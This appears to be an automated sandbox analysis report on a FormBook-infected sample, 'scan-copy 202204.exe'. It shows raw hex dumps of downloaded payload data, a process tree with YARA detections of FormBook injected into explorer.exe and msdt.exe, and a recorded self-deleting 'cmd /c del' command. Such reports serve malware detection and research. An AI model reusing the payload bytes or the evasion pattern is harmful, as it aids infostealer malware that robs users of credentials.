                                                      2022-04-20 12:54:01 UTC1015INData Raw: ff c2 38 04 00 05 74 7d 58 6a 1e 04 00 05 74 7b 02 02 00 00 00 21 38 00 00 01 8f 38 00 00 00 0a 38 06 00 06 59 28 17 1e 02 00 00 00 99 38 04 00 05 73 7d 59 1e 04 00 05 73 7b 02 02 00 00 01 c8 38 00 00 01 cd 00 00 00 01 45 00 01 0c fe 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 6a 16 00 12 00 00 ff ff ff e2 38 00 13 02 2a 61 5f 7f ff ff ff ff ff ff ff 21 63 17 00 11 65 5f 6a 17 00 11 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 6a 16 00 12 00 00 00 ff ff ff e7 38 00 13 02 2a 61 5f 7f ff ff ff 20 63 17 00 11 65 5f 17 00 11 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 16 00 00 12 00 ff ff fe 8d 38 00 00 00 00 20 26 ff ff fe 98 3a 04 00 08 0e 7b 04 00 08 43 7e 00 00 00 00 20 ff ff ff e0 39 01 11 ff ff ff 27 38 ff
                                                      Data Ascii: 8t}Xjt{!888Y(8s}Ys{8EP*j8*a_!ce_j*j8*a_ ce_*8 &:{C~ 9'8
                                                      2022-04-20 12:54:01 UTC1023INData Raw: 01 8d 73 06 00 0d 46 28 61 04 00 08 1c 7b 04 00 08 43 7e 61 ff 84 ea b3 20 9e 13 d0 1a 20 ff ff ff 68 38 01 13 06 00 0a 19 6f 03 00 11 ff ff ff 4a 38 ff ff ff 70 3b 04 04 00 05 37 7b 02 ff ff ff 49 38 00 00 00 00 20 26 ff ff ff 54 3a 04 00 08 0d 7b 04 00 08 43 7e 00 00 00 00 20 ff ff ff b4 3a 01 10 59 17 25 03 00 00 00 b4 38 00 00 00 e0 3b 06 00 0a 23 6f 04 00 11 03 7a 06 00 06 02 73 06 00 0d 46 28 61 04 00 07 ea 7b 04 00 08 43 7e 61 76 0d 32 6f 20 30 19 63 38 20 00 00 00 bd 38 00 13 06 00 05 c3 28 02 2a 00 00 00 e8 38 00 00 00 c3 3a 01 11 00 00 00 0c 38 04 00 05 37 7d 04 02 7a 06 00 06 02 73 06 00 0d 46 28 61 04 00 07 ec 7b 04 00 08 43 7e 61 e0 4d 9a a8 20 ca 64 82 b4 20 00 00 01 16 38 00 00 00 80 00 00 01 1b 00 00 00 02 45 00 02 0c fe 00 00 00 00 38 00
                                                      Data Ascii: sF(a{C~a h8oJ8p;7{I8 &T:{C~ :Y%8;#ozsF(a{C~av2o 0c8 8(*8:87}zsF(a{C~aM d 8E8
                                                      2022-04-20 12:54:01 UTC1039INData Raw: d0 38 ff ff ff 27 38 ff ff fc d1 38 00 00 00 06 20 26 ff ff fc dc 39 04 00 07 f1 7b 04 00 08 43 7e 00 00 00 06 20 0a 13 06 00 06 5e 6f 03 ff ff fd 90 38 ff ff fd 53 3a 02 ff ff ff 04 38 ff ff fe 52 ff ff fe e0 00 00 00 49 ff ff fe e0 ff ff fe e0 ff ff fe e0 ff ff ff 90 00 00 00 10 00 00 01 11 ff ff fe 86 00 00 00 0a 45 59 17 01 11 00 00 02 57 38 00 00 02 5d 38 17 ff ff fd 44 38 00 00 00 05 20 26 ff ff fd 4f 3a 04 00 07 d8 7b 04 00 08 43 7e 00 00 00 05 20 ff ff ff 81 3f 16 03 11 ff ff fe 10 38 03 13 06 00 06 5e 6f 03 ff ff ff a8 38 00 10 06 00 06 65 6f 03 00 00 02 12 38 ff ff ff a8 39 08 11 00 00 01 8d 38 00 00 00 5d 3d 16 01 13 25 06 00 06 6e 6f 03 ff ff ff c3 38 06 00 05 c5 6f 05 03 11 06 00 06 8a 6f 03 00 00 01 f0 38 00 00 02 1c 3a 5f 17 04 0e ff ff fe
                                                      Data Ascii: 8'88 &9{C~ ^o8S:8RIEYW8]8D8 &O:{C~ ?8^o8eo898]=%no8oo8:_
                                                      2022-04-20 12:54:01 UTC1055INData Raw: 04 00 03 b2 7b 02 00 00 00 2a 17 00 00 12 00 00 ff ff ff f3 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 2a 04 00 03 b1 7b 02 00 00 00 2a 14 00 00 12 00 00 ff ff ff f3 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 2a 04 00 03 b0 7b 02 00 00 00 2a 14 00 00 12 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 2a 04 00 03 af 7b 02 00 00 00 2a 16 00 00 12 00 00 2a 00 00 00 00 38 06 00 01 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 2a 04 00 03 ae 7e 00 00 00 2a 14 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 17 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 2a 06 00 0d 41 28 06 00 0d 4c 28 2e 00 00 00 00 19 00 4d 3f 00 0e 00 02 00
                                                      Data Ascii: {*8**{*8**{****{**8**~****A(L(.M?
                                                      2022-04-20 12:54:01 UTC1071INData Raw: ff fa 38 2a 00 00 08 ab 38 00 00 08 b0 00 00 00 01 45 00 1d 0c fe 00 00 08 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 ff ff ff d8 38 00 13 06 00 03 10 6f 06 00 04 74 28 2a ff ff ff d2 38 00 00 00 05 38 ff ff ff e8 38 ff ff ff e1 39 00 11 00 00 00 0c 38 06 00 02 55 28 03 02 00 00 00 22 38 06 00 02 54 28 03 02 00 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 2a 04 00 03 87 7e 00 00 00 2a 14 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 17 00 00 12 00 00 00 ff ff ff da 38 00 13 0a 00 00 f9 6f 0a 00 00 38 7e 06 00 01 33 28 9c 83 3b e2 20 00 11 ff ff ff e8 38 01 13 00 11 00 00 00 09 38 00 13 0a 00 01 44 28 2a 01 11 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 00 ff ff ff dc
                                                      Data Ascii: 8*8E*8ot(*88898U("8T(/**~**8o8~3(; 88D(**
                                                      2022-04-20 12:54:01 UTC1087INData Raw: 38 00 01 0b fe 58 18 03 ff ff fe bc 38 ff ff ff a5 3f 16 02 11 2a ff ff fe b8 38 00 00 00 00 20 26 ff ff fe c3 3a 04 00 08 0e 7b 04 00 08 43 7e 00 00 00 00 20 ff ff ff 84 40 00 00 01 00 20 01 13 25 62 17 01 11 ff ff ff 28 38 04 13 69 8e 04 ff ff ff 4d 38 9c 91 02 13 58 17 25 02 11 04 00 13 58 17 25 00 11 04 2a 00 00 00 60 38 07 13 5f 00 00 03 ff 20 60 91 58 17 03 02 62 1e 91 03 02 00 00 00 30 38 01 13 00 00 00 80 20 00 00 00 0c 38 05 13 58 19 63 18 91 03 02 00 00 00 0e 38 03 13 16 00 00 00 08 38 ff ff ff b6 39 5f 01 11 03 11 ff ff ff 53 38 00 00 00 00 20 26 ff ff ff 5e 3a 04 00 08 2c 7b 04 00 08 43 7e 00 00 00 01 20 00 00 00 69 3f 04 11 00 11 ff ff ff ad 38 9c 91 00 01 0b fe 58 17 25 03 02 00 13 58 17 25 00 11 04 00 00 00 18 38 ff ff ff ca 3f 16 05 13 25
                                                      Data Ascii: 8X8?*8 &:{C~ @ %b(8iM8X%X%*`8_ `Xb08 8Xc889_S8 &^:,{C~ i?8X%X%8?%
                                                      2022-04-20 12:54:01 UTC1103INData Raw: 00 00 00 31 39 0a 00 00 a7 6f 04 0a 0a 00 00 b0 6f 0a 00 00 a4 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 ff ff ff ea 38 26 0a 00 00 a8 6f 69 8e 00 11 16 00 11 02 2a 00 11 00 00 00 03 38 00 13 01 00 00 31 8d d4 0a 00 00 af 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 00 00 2a 14 2a 06 00 00 97 28 06 00 00 00 07 39 0a 00 00 ae 6f 00 12 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 00 00 00 00 19 00 60 53 00 0d 00 02 00 00 00 00 0d 00 53 36 00 1d 00 02 00 00 1c 01 00 ff ff ff cb 38 00 13 0a 00 00 ad 28 ff ff ff 59 38 01 13 0a 00 00 ab 6f 02 00 11 00 00 00 00 38 ff ff ff df 39 0a 00 00 ac 6f 06 00 01 33 28 9c 83 31 29 20 02 2a 04 11 2a 0a 00 00 ab 6f 02 00 11 00 00 00 00 38 dc 00 00 00 00 38 06 00 00 a0
                                                      Data Ascii: 19ooo*8&oi*81o***(9o*`SS68(Y8o89o3(1) **o88


                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:14:53:36
                                                      Start date:20/04/2022
                                                      Path:C:\Users\user\Desktop\scan-copy 202204.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\scan-copy 202204.exe"
                                                      Imagebase:0xcc0000
                                                      File size:48128 bytes
                                                      MD5 hash:CE536566BED415B6BE2B7635CFB03AF0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.350851832.000000000422E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.350851832.000000000422E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.350851832.000000000422E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.350752708.0000000004198000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.350752708.0000000004198000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.350752708.0000000004198000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.350609440.00000000040F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.350609440.00000000040F1000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.350609440.00000000040F1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      Target ID:10
                                                      Start time:14:54:05
                                                      Start date:20/04/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\cmd.exe" /c timeout 10
                                                      Imagebase:0xc20000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:11
                                                      Start time:14:54:06
                                                      Start date:20/04/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c9170000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:12
                                                      Start time:14:54:06
                                                      Start date:20/04/2022
                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:timeout 10
                                                      Imagebase:0xb30000
                                                      File size:26112 bytes
                                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:15
                                                      Start time:14:54:17
                                                      Start date:20/04/2022
                                                      Path:C:\Users\user\Desktop\scan-copy 202204.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\scan-copy 202204.exe
                                                      Imagebase:0x860000
                                                      File size:48128 bytes
                                                      MD5 hash:CE536566BED415B6BE2B7635CFB03AF0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.346977202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.346977202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.346977202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.417985848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.417985848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.417985848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.418441297.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.418441297.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.418441297.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.418321488.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.418321488.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.418321488.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.347441140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.347441140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.347441140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      Target ID:16
                                                      Start time:14:54:20
                                                      Start date:20/04/2022
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff6b8cf0000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000000.380882775.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000000.380882775.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000000.380882775.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000000.405802812.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000000.405802812.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000000.405802812.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:high

                                                      Target ID:18
                                                      Start time:14:54:48
                                                      Start date:20/04/2022
                                                      Path:C:\Windows\SysWOW64\msdt.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\msdt.exe
                                                      Imagebase:0x13e0000
                                                      File size:1508352 bytes
                                                      MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.522775932.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.522775932.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.522775932.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.525132874.0000000004970000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.525132874.0000000004970000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.525132874.0000000004970000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.523682019.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.523682019.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.523682019.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      Target ID:20
                                                      Start time:14:54:53
                                                      Start date:20/04/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del "C:\Users\user\Desktop\scan-copy 202204.exe"
                                                      Imagebase:0xc20000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:21
                                                      Start time:14:54:54
                                                      Start date:20/04/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c9170000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      No disassembly